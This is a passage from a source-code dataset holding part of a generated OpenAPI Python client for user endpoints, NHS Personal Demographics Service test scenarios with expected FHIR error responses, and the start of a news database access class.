            kwargs['_preload_content'] = kwargs.get(
                '_preload_content', True
            )
            kwargs['_request_timeout'] = kwargs.get(
                '_request_timeout', None
            )
            kwargs['_check_input_type'] = kwargs.get(
                '_check_input_type', True
            )
            kwargs['_check_return_type'] = kwargs.get(
                '_check_return_type', True
            )
            kwargs['_host_index'] = kwargs.get('_host_index')
            kwargs['user'] = \
                user
            return self.call_with_http_info(**kwargs)

        self.users_create = _Endpoint(
            settings={
                'response_type': (User,),
                'auth': [
                    'basicAuth',
                    'cookieAuth',
                    'jwtAuth',
                    'tokenAuth'
                ],
                'endpoint_path': '/users',
                'operation_id': 'users_create',
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': [
                    'user',
                ],
                'required': [
                    'user',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'user':
                        (User,),
                },
                'attribute_map': {
                },
                'location_map': {
                    'user': 'body',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json',
                    'application/x-www-form-urlencoded',
                    'multipart/form-data'
                ]
            },
            api_client=api_client,
            callable=__users_create
        )
        def __users_destroy(
            self,
            id,
            **kwargs
        ):
            """users_destroy  # noqa: E501

            **Permission restrictions:** + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.*  # noqa: E501
            This method makes a synchronous HTTP request by default. To make an
            asynchronous HTTP request, please pass async_req=True

            >>> thread = api.users_destroy(id, async_req=True)
            >>> result = thread.get()

            Args:
                id (int): A unique integer value identifying this user.

            Keyword Args:
                _return_http_data_only (bool): response data without head status
                    code and headers. Default is True.
                _preload_content (bool): if False, the urllib3.HTTPResponse object
                    will be returned without reading/decoding response data.
                    Default is True.
                _request_timeout (int/float/tuple): timeout setting for this request. If
                    one number provided, it will be total request timeout. It can also
                    be a pair (tuple) of (connection, read) timeouts.
                    Default is None.
                _check_input_type (bool): specifies if type checking
                    should be done one the data sent to the server.
                    Default is True.
                _check_return_type (bool): specifies if type checking
                    should be done one the data received from the server.
                    Default is True.
                _host_index (int/None): specifies the index of the server
                    that we want to use.
                    Default is read from the configuration.
                async_req (bool): execute request asynchronously

            Returns:
                None
                    If the method is called asynchronously, returns the request
                    thread.
            """
            kwargs['async_req'] = kwargs.get(
                'async_req', False
            )
            kwargs['_return_http_data_only'] = kwargs.get(
                '_return_http_data_only', True
            )
            kwargs['_preload_content'] = kwargs.get(
                '_preload_content', True
            )
            kwargs['_request_timeout'] = kwargs.get(
                '_request_timeout', None
            )
            kwargs['_check_input_type'] = kwargs.get(
                '_check_input_type', True
            )
            kwargs['_check_return_type'] = kwargs.get(
                '_check_return_type', True
            )
            kwargs['_host_index'] = kwargs.get('_host_index')
            kwargs['id'] = \
                id
            return self.call_with_http_info(**kwargs)

        self.users_destroy = _Endpoint(
            settings={
                'response_type': None,
                'auth': [
                    'basicAuth',
                    'cookieAuth',
                    'jwtAuth',
                    'tokenAuth'
                ],
                'endpoint_path': '/users/{id}',
                'operation_id': 'users_destroy',
                'http_method': 'DELETE',
                'servers': None,
            },
            params_map={
                'all': [
                    'id',
                ],
                'required': [
                    'id',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'id':
                        (int,),
                },
                'attribute_map': {
                    'id': 'id',
                },
                'location_map': {
                    'id': 'path',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [],
                'content_type': [],
            },
            api_client=api_client,
            callable=__users_destroy
        )
        def __users_list(
            self,
            **kwargs
        ):
            """users_list  # noqa: E501

            **Permission restrictions:** + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.*  # noqa: E501
            This method makes a synchronous HTTP request by default. To make an
            asynchronous HTTP request, please pass async_req=True

            >>> thread = api.users_list(async_req=True)
            >>> result = thread.get()

            Keyword Args:
                limit (int): Number of results to return per page.. [optional]
                offset (int): The initial index from which to return the results.. [optional]
                _return_http_data_only (bool): response data without head status
                    code and headers. Default is True.
                _preload_content (bool): if False, the urllib3.HTTPResponse object
                    will be returned without reading/decoding response data.
                    Default is True.
                _request_timeout (int/float/tuple): timeout setting for this request. If
                    one number provided, it will be total request timeout. It can also
                    be a pair (tuple) of (connection, read) timeouts.
                    Default is None.
                _check_input_type (bool): specifies if type checking
                    should be done one the data sent to the server.
                    Default is True.
                _check_return_type (bool): specifies if type checking
                    should be done one the data received from the server.
                    Default is True.
                _host_index (int/None): specifies the index of the server
                    that we want to use.
                    Default is read from the configuration.
                async_req (bool): execute request asynchronously

            Returns:
                PaginatedUserList
                    If the method is called asynchronously, returns the request
                    thread.
            """
            kwargs['async_req'] = kwargs.get(
                'async_req', False
            )
            kwargs['_return_http_data_only'] = kwargs.get(
                '_return_http_data_only', True
            )
            kwargs['_preload_content'] = kwargs.get(
                '_preload_content', True
            )
            kwargs['_request_timeout'] = kwargs.get(
                '_request_timeout', None
            )
            kwargs['_check_input_type'] = kwargs.get(
                '_check_input_type', True
            )
            kwargs['_check_return_type'] = kwargs.get(
                '_check_return_type', True
            )
            kwargs['_host_index'] = kwargs.get('_host_index')
            return self.call_with_http_info(**kwargs)

        self.users_list = _Endpoint(
            settings={
                'response_type': (PaginatedUserList,),
                'auth': [
                    'basicAuth',
                    'cookieAuth',
                    'jwtAuth',
                    'tokenAuth'
                ],
                'endpoint_path': '/users',
                'operation_id': 'users_list',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': [
                    'limit',
                    'offset',
                ],
                'required': [],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'limit':
                        (int,),
                    'offset':
                        (int,),
                },
                'attribute_map': {
                    'limit': 'limit',
                    'offset': 'offset',
                },
                'location_map': {
                    'limit': 'query',
                    'offset': 'query',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [],
            },
            api_client=api_client,
            callable=__users_list
        )
        def __users_partial_update(
            self,
            id,
            **kwargs
        ):
            """users_partial_update  # noqa: E501

            **Permission restrictions:** + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.*  # noqa: E501
            This method makes a synchronous HTTP request by default. To make an
            asynchronous HTTP request, please pass async_req=True

            >>> thread = api.users_partial_update(id, async_req=True)
            >>> result = thread.get()

            Args:
                id (int): A unique integer value identifying this user.

            Keyword Args:
                patched_user (PatchedUser): [optional]
                _return_http_data_only (bool): response data without head status
                    code and headers. Default is True.
                _preload_content (bool): if False, the urllib3.HTTPResponse object
                    will be returned without reading/decoding response data.
                    Default is True.
                _request_timeout (int/float/tuple): timeout setting for this request. If
                    one number provided, it will be total request timeout. It can also
                    be a pair (tuple) of (connection, read) timeouts.
                    Default is None.
                _check_input_type (bool): specifies if type checking
                    should be done one the data sent to the server.
                    Default is True.
                _check_return_type (bool): specifies if type checking
                    should be done one the data received from the server.
                    Default is True.
                _host_index (int/None): specifies the index of the server
                    that we want to use.
                    Default is read from the configuration.
                async_req (bool): execute request asynchronously

            Returns:
                User
                    If the method is called asynchronously, returns the request
                    thread.
            """
            kwargs['async_req'] = kwargs.get(
                'async_req', False
            )
            kwargs['_return_http_data_only'] = kwargs.get(
                '_return_http_data_only', True
            )
            kwargs['_preload_content'] = kwargs.get(
                '_preload_content', True
            )
            kwargs['_request_timeout'] = kwargs.get(
                '_request_timeout', None
            )
            kwargs['_check_input_type'] = kwargs.get(
                '_check_input_type', True
            )
            kwargs['_check_return_type'] = kwargs.get(
                '_check_return_type', True
            )
            kwargs['_host_index'] = kwargs.get('_host_index')
            kwargs['id'] = \
                id
            return self.call_with_http_info(**kwargs)

        self.users_partial_update = _Endpoint(
            settings={
                'response_type': (User,),
                'auth': [
                    'basicAuth',
                    'cookieAuth',
                    'jwtAuth',
                    'tokenAuth'
                ],
                'endpoint_path': '/users/{id}',
                'operation_id': 'users_partial_update',
                'http_method': 'PATCH',
                'servers': None,
            },
            params_map={
                'all': [
                    'id',
                    'patched_user',
                ],
                'required': [
                    'id',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'id':
                        (int,),
                    'patched_user':
                        (PatchedUser,),
                },
                'attribute_map': {
                    'id': 'id',
                },
                'location_map': {
                    'id': 'path',
                    'patched_user': 'body',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json',
                    'application/x-www-form-urlencoded',
                    'multipart/form-data'
                ]
            },
            api_client=api_client,
            callable=__users_partial_update
        )
        def __users_retrieve(
            self,
            id,
            **kwargs
        ):
            """users_retrieve  # noqa: E501

            **Permission restrictions:** + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.*  # noqa: E501
            This method makes a synchronous HTTP request by default. To make an
            asynchronous HTTP request, please pass async_req=True

            >>> thread = api.users_retrieve(id, async_req=True)
            >>> result = thread.get()

            Args:
                id (int): A unique integer value identifying this user.

            Keyword Args:
                _return_http_data_only (bool): response data without head status
                    code and headers. Default is True.
                _preload_content (bool): if False, the urllib3.HTTPResponse object
                    will be returned without reading/decoding response data.
                    Default is True.
                _request_timeout (int/float/tuple): timeout setting for this request. If
                    one number provided, it will be total request timeout. It can also
                    be a pair (tuple) of (connection, read) timeouts.
                    Default is None.
                _check_input_type (bool): specifies if type checking
                    should be done one the data sent to the server.
                    Default is True.
                _check_return_type (bool): specifies if type checking
                    should be done one the data received from the server.
                    Default is True.
                _host_index (int/None): specifies the index of the server
                    that we want to use.
                    Default is read from the configuration.
                async_req (bool): execute request asynchronously

            Returns:
                User
                    If the method is called asynchronously, returns the request
                    thread.
            """
            kwargs['async_req'] = kwargs.get(
                'async_req', False
            )
            kwargs['_return_http_data_only'] = kwargs.get(
                '_return_http_data_only', True
            )
            kwargs['_preload_content'] = kwargs.get(
                '_preload_content', True
            )
            kwargs['_request_timeout'] = kwargs.get(
                '_request_timeout', None
            )
            kwargs['_check_input_type'] = kwargs.get(
                '_check_input_type', True
            )
            kwargs['_check_return_type'] = kwargs.get(
                '_check_return_type', True
            )
            kwargs['_host_index'] = kwargs.get('_host_index')
            kwargs['id'] = \
                id
            return self.call_with_http_info(**kwargs)

        self.users_retrieve = _Endpoint(
            settings={
                'response_type': (User,),
                'auth': [
                    'basicAuth',
                    'cookieAuth',
                    'jwtAuth',
                    'tokenAuth'
                ],
                'endpoint_path': '/users/{id}',
                'operation_id': 'users_retrieve',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': [
                    'id',
                ],
                'required': [
                    'id',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'id':
                        (int,),
                },
                'attribute_map': {
                    'id': 'id',
                },
                'location_map': {
                    'id': 'path',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [],
            },
            api_client=api_client,
            callable=__users_retrieve
        )
        def __users_update(
            self,
            id,
            user,
            **kwargs
        ):
            """users_update  # noqa: E501

            **Permission restrictions:** + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.*  # noqa: E501
            This method makes a synchronous HTTP request by default. To make an
            asynchronous HTTP request, please pass async_req=True

            >>> thread = api.users_update(id, user, async_req=True)
            >>> result = thread.get()

            Args:
                id (int): A unique integer value identifying this user.
                user (User):

            Keyword Args:
                _return_http_data_only (bool): response data without head status
                    code and headers. Default is True.
                _preload_content (bool): if False, the urllib3.HTTPResponse object
                    will be returned without reading/decoding response data.
                    Default is True.
                _request_timeout (int/float/tuple): timeout setting for this request. If
                    one number provided, it will be total request timeout. It can also
                    be a pair (tuple) of (connection, read) timeouts.
                    Default is None.
                _check_input_type (bool): specifies if type checking
                    should be done one the data sent to the server.
                    Default is True.
                _check_return_type (bool): specifies if type checking
                    should be done one the data received from the server.
                    Default is True.
                _host_index (int/None): specifies the index of the server
                    that we want to use.
                    Default is read from the configuration.
                async_req (bool): execute request asynchronously

            Returns:
                User
                    If the method is called asynchronously, returns the request
                    thread.
            """
            kwargs['async_req'] = kwargs.get(
                'async_req', False
            )
            kwargs['_return_http_data_only'] = kwargs.get(
                '_return_http_data_only', True
            )
            kwargs['_preload_content'] = kwargs.get(
                '_preload_content', True
            )
            kwargs['_request_timeout'] = kwargs.get(
                '_request_timeout', None
            )
            kwargs['_check_input_type'] = kwargs.get(
                '_check_input_type', True
            )
            kwargs['_check_return_type'] = kwargs.get(
                '_check_return_type', True
            )
            kwargs['_host_index'] = kwargs.get('_host_index')
            kwargs['id'] = \
                id
            kwargs['user'] = \
                user
            return self.call_with_http_info(**kwargs)

        self.users_update = _Endpoint(
            settings={
                'response_type': (User,),
                'auth': [
                    'basicAuth',
                    'cookieAuth',
                    'jwtAuth',
                    'tokenAuth'
                ],
                'endpoint_path': '/users/{id}',
                'operation_id': 'users_update',
                'http_method': 'PUT',
                'servers': None,
            },
            params_map={
                'all': [
                    'id',
                    'user',
                ],
                'required': [
                    'id',
                    'user',
                ],
                'nullable': [
                ],
                'enum': [
                ],
                'validation': [
                ]
            },
            root_map={
                'validations': {
                },
                'allowed_values': {
                },
                'openapi_types': {
                    'id':
                        (int,),
                    'user':
                        (User,),
                },
                'attribute_map': {
                    'id': 'id',
                },
                'location_map': {
                    'id': 'path',
                    'user': 'body',
                },
                'collection_format_map': {
                }
            },
            headers_map={
                'accept': [
                    'application/json'
                ],
                'content_type': [
                    'application/json',
                    'application/x-www-form-urlencoded',
                    'multipart/form-data'
                ]
            },
            api_client=api_client,
            callable=__users_update
        )
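The docstrings above describe the generated client's dispatch pattern: calls run synchronously by default, and `async_req=True` returns a thread handle whose `.get()` blocks for the result. A minimal self-contained sketch of that pattern follows; `call_endpoint`, `ApplyResultLike`, and `fake_users_list` are illustrative names, not part of `openapi_client`:

```python
from concurrent.futures import ThreadPoolExecutor


class ApplyResultLike:
    """Minimal stand-in for the thread handle returned when async_req=True."""

    def __init__(self, future):
        self._future = future

    def get(self, timeout=None):
        # Block until the background call finishes and return its result.
        return self._future.result(timeout)


_pool = ThreadPoolExecutor(max_workers=4)


def call_endpoint(fn, *args, async_req=False, **kwargs):
    """Run fn synchronously, or submit it to the pool when async_req=True."""
    if not async_req:
        return fn(*args, **kwargs)
    return ApplyResultLike(_pool.submit(fn, *args, **kwargs))


def fake_users_list(limit=10):
    """Placeholder for an HTTP call such as users_list."""
    return {'count': 0, 'results': [], 'limit': limit}


# Mirrors the docstring usage: thread = api.users_list(async_req=True)
thread = call_endpoint(fake_users_list, limit=5, async_req=True)
result = thread.get()  # → {'count': 0, 'results': [], 'limit': 5}
```

The real `_Endpoint` wrapper adds parameter validation and serialization on top of this dispatch, but the synchronous/asynchronous split works the same way.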
# File: tests/user_restricted/data/pds_scenarios.py (repo: NHSDigital/personal-demographics-service-api, MIT license)
from ..configuration.config import TEST_PATIENT_ID, SPINE_HOSTNAME
retrieve = [
{"scenario": "retrieve_patient", "patient": "9693632109", "patient_returned":"9693632109"}, # noqa: E231, E501
{"scenario": "retrieve_auth_header_missing_or_blank", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "forbidden", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "ACCESS_DENIED", "display": "Access Denied - Unauthorised"}]}, "diagnostics": "Invalid access token"}]}}, # noqa: E231, E501
{"scenario": "retrieve_auth_header_invalid_token", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "forbidden", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "ACCESS_DENIED", "display": "Access Denied - Unauthorised"}]}, "diagnostics": "Invalid Access Token"}]}}, # noqa: E231, E501
{"scenario": "retrieve_urid_header_missing", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "value", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "MISSING_VALUE", "display": "Required value is missing"}]}, "diagnostics": "Missing value in header 'NHSD-Session-URID'"}]}}, # noqa: E231, E501
{"scenario": "retrieve_x_request_header_blank", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "value", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "INVALID_VALUE", "display": "Provided value is invalid"}]}, "diagnostics": "Invalid value - '' in header 'X-Request-ID'"}]}}, # noqa: E231, E501
{"scenario": "retrieve_x_request_header_invalid", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "value", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "INVALID_VALUE", "display": "Provided value is invalid"}]}, "diagnostics": "Invalid value - '1234' in header 'X-Request-ID'"}]}}, # noqa: E231, E501
{"scenario": "retrieve_x_request_header_missing", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "structure", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "PRECONDITION_FAILED", "display": "Required condition was not fulfilled"}]}, "diagnostics": "Invalid request with error - X-Request-ID header must be supplied to access this resource"}]}}, # noqa: E231, E501
{"scenario": "retrieve_related_person", "patient": "9693633679", "response": {"entry":[{"fullUrl":f"{SPINE_HOSTNAME}/personal-demographics/FHIR/R4/Patient/9693633679/RelatedPerson/qWyGt","resource":{"active":True,"id":"qWyGt","patient":{"identifier":{"system":"https://beta.api.digital.nhs.uk","value":"9693633687"},"reference":"https://beta.api.digital.nhs.uk/Patient/9693633687","type":"Patient"},"relationship":[{"coding":[{"code":"SPS","display":"spouse","system":"http://hl7.org/fhir/ValueSet/relatedperson-relationshiptype"},{"code":"Personal","display":"Personal relationship with the patient","system":"https://fhir.nhs.uk/R4/CodeSystem/UKCore-AdditionalRelatedPersonRole"},{"code":"N","display":"Next-of-Kin","system":"http://hl7.org/fhir/ValueSet/relatedperson-relationshiptype"}]}],"resourceType":"RelatedPerson"}}],"resourceType":"Bundle","total":1,"type":"searchset"}}, # noqa: E231, E501
{"scenario": "retrieve_urid_header_invalid", "patient": "9693632109", "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "value", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1", "code": "INVALID_VALUE", "display": "Provided value is invalid"}]}, "diagnostics": "Invalid value - 'invalid' in header 'NHSD-Session-URID'. Refer to the guidance for this header in our API Specification https://digital.nhs.uk/developer/api-catalogue/personal-demographics-service-fhir"}]}} # noqa: E231, E501
]
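# Scenario dictionaries like the ones above are typically fed to parametrised
# tests: a happy-path entry carries the expected "patient_returned" NHS number,
# while error entries carry a full OperationOutcome body to compare against.
# A minimal self-contained sketch of that dispatch (data inlined and trimmed;
# helper names are illustrative, not part of this test suite):

```python
# Trimmed copies of two scenario entries from the retrieve list above.
example_scenarios = [
    {"scenario": "retrieve_patient", "patient": "9693632109",
     "patient_returned": "9693632109"},
    {"scenario": "retrieve_auth_header_missing_or_blank", "patient": "9693632109",
     "response": {"resourceType": "OperationOutcome"}},
]


def expected_outcome(scenario):
    """Decide what a parametrised test should assert for one scenario dict."""
    if "patient_returned" in scenario:
        # Happy path: the retrieved Patient resource should carry this NHS number.
        return ("patient", scenario["patient_returned"])
    # Error path: the response body should be the stored OperationOutcome.
    return ("error", scenario["response"]["resourceType"])


assert expected_outcome(example_scenarios[0]) == ("patient", "9693632109")
assert expected_outcome(example_scenarios[1]) == ("error", "OperationOutcome")
```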
search = [
{"scenario": "simple_search_happy_path","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "patient_returned":"9693632117"}, # noqa: E231, E501
{"scenario": "simple_search_with_auth_header_missing_or_blank","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"forbidden","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"ACCESS_DENIED","display":"Access Denied - Unauthorised"}]},"diagnostics":"Invalid access token"}]}}, # noqa: E231, E501
{"scenario": "simple_search_with_auth_header_invalid_token","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "response": {"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "forbidden", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1","code": "ACCESS_DENIED", "display": "Access Denied - Unauthorised"}]},"diagnostics": "Invalid Access Token"}]}}, # noqa: E231, E501
{"scenario": "simple_search_with_urid_header_missing","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"value","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"MISSING_VALUE","display":"Required value is missing"}]},"diagnostics":"Missing value in header 'NHSD-Session-URID'"}]}}, # noqa: E231, E501
{"scenario": "simple_search_with_x_request_header_blank","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"value","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"INVALID_VALUE","display":"Provided value is invalid"}]},"diagnostics":"Invalid value - '' in header 'X-Request-ID'"}]}}, # noqa: E231, E501
{"scenario": "simple_search_with_x_request_header_invalid","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"value","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"INVALID_VALUE","display":"Provided value is invalid"}]},"diagnostics":"Invalid value - '1234' in header 'X-Request-ID'"}]}}, # noqa: E231, E501
{"scenario": "simple_search_with_x_request_header_missing","query_params": {"family": "Capon", "gender": "male", "birthdate": "eq1953-05-29"}, "response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"structure","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"PRECONDITION_FAILED","display":"Required condition was not fulfilled"}]},"diagnostics":"Invalid request with error - X-Request-ID header must be supplied to access this resource"}]}}, # noqa: E231, E501
{"scenario": "simple_search_happy_path","query_params": {"family": "Massam", "birthdate": "eq1920-08-11"}, "patient_returned":"9693632966"}, # noqa: E231, E501
{"scenario": "simple_search_happy_path","query_params": {"family": "Massam", "birthdate": "le1920-08-11"}, "patient_returned":"9693632966"}, # noqa: E231, E501
{"scenario": "simple_search_patient_happy_path_sensitive", "query_params": {"family": "Godsoe", "gender": "male", "birthdate": "eq1936-02-24"}, "patient_returned":"9693632125"}, # noqa: E231, E501
]
update = [
{"scenario": "update_dob_happy_path", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/gender","value":"male"}]}}, # noqa: E231, E501
{"scenario": "update_with_auth_header_missing_or_blank", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]},"response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"forbidden","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"ACCESS_DENIED","display":"Access Denied - Unauthorised"}]},"diagnostics":"Invalid access token"}]}}, # noqa: E231, E501
{"scenario": "update_with_auth_header_invalid", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]},"response":{"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "forbidden", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1","code": "ACCESS_DENIED", "display": "Access Denied - Unauthorised"}]},"diagnostics": "Invalid Access Token"}]}}, # noqa: E231, E501
{"scenario": "update_with__urid_header_missing", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]},"response":{"resourceType": "OperationOutcome", "issue": [{"severity": "error", "code": "value", "details": {"coding": [{"system": "https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode", "version": "1","code": "MISSING_VALUE", "display": "Required value is missing"}]},"diagnostics": "Missing value in header 'NHSD-Session-URID'"}]}}, # noqa: E231, E501
{"scenario": "update_with_x_request_header_blank", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]},"response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"value","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"INVALID_VALUE","display":"Provided value is invalid"}]},"diagnostics":"Invalid value - '' in header 'X-Request-ID'"}]}}, # noqa: E231, E501
{"scenario": "update_with_x_request_header_invalid", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]}, "response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"value","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"INVALID_VALUE","display":"Provided value is invalid"}]},"diagnostics":"Invalid value - '1234' in header 'X-Request-ID'"}]}}, # noqa: E231, E501
{"scenario": "update_with_x_request_header_missing", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]},"response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"structure","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"PRECONDITION_FAILED","display":"Required condition was not fulfilled"}]},"diagnostics":"Invalid request with error - X-Request-ID header must be supplied to access this resource"}]}}, # noqa: E231, E501
{"scenario": "update_with_low_x_sync_wait", "patient": TEST_PATIENT_ID,"patch":{"patches":[{"op":"replace","path":"/birthDate","value":"2001-01-01"}]},"response":{"resourceType":"OperationOutcome","issue":[{"severity":"error","code":"structure","details":{"coding":[{"system":"https://fhir.nhs.uk/R4/CodeSystem/Spine-ErrorOrWarningCode","version":"1","code":"SERVICE_UNAVAILABLE","display":"Service unavailable"}]},"diagnostics":"The downstream domain processing has not completed within the configured timeout period. Retry your request after the time specified by the 'Retry-After' header, using the same 'X-Request-ID'"}]}}, # noqa: E231, E501
]
| 309.692308 | 906 | 0.695562 | 1,381 | 12,078 | 5.958001 | 0.125996 | 0.026252 | 0.039378 | 0.058337 | 0.860476 | 0.855858 | 0.842854 | 0.828755 | 0.803354 | 0.788162 | 0 | 0.046634 | 0.067892 | 12,078 | 38 | 907 | 317.842105 | 0.684225 | 0.03792 | 0 | 0 | 0 | 0.058824 | 0.729296 | 0.082729 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.029412 | 0 | 0.029412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
12e8fc4e610effbfaad9777169efe6c6326657e3 | 6,891 | py | Python | db/news_dao.py | AliceHu0619/news-management-system | 88dd7b093b8fcaff47805a27cf6e6b9ab695abbc | [
"MIT"
] | null | null | null | db/news_dao.py | AliceHu0619/news-management-system | 88dd7b093b8fcaff47805a27cf6e6b9ab695abbc | [
"MIT"
] | null | null | null | db/news_dao.py | AliceHu0619/news-management-system | 88dd7b093b8fcaff47805a27cf6e6b9ab695abbc | [
"MIT"
] | null | null | null | from db.mysql_db import pool
class NewsDao:
    # Query the list of news pending approval
def search_unreview_list(self,page):
try:
con=pool.get_connection()
cursor=con.cursor()
sql="SELECT n.id,n.title,t.type,u.username " \
"FROM t_news n JOIN t_type t ON n.type_id=t.id " \
"JOIN t_user u ON n.editor_id=u.id " \
